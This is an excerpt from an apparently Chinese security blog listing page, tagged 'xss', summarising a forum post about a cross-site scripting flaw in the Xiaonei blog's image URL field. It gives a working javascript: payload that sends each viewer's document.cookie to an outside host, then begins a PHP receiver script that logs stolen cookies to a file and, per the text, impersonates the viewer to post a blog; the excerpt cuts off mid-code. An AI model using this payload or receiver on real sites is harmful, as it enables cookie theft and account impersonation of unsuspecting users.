现在位置 >首页 > xss
0℃
狼族论坛fly发的 校内网在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发:   javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookietest.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下: <?php ob_start(); $url = 'blog.xiaonei.com'; $cookie=$_GET['cookie']; $cookie1=$cookie."\r\n\r\n"; fputs(fopen('a.txt','a+'),$cookie1...
阅读全文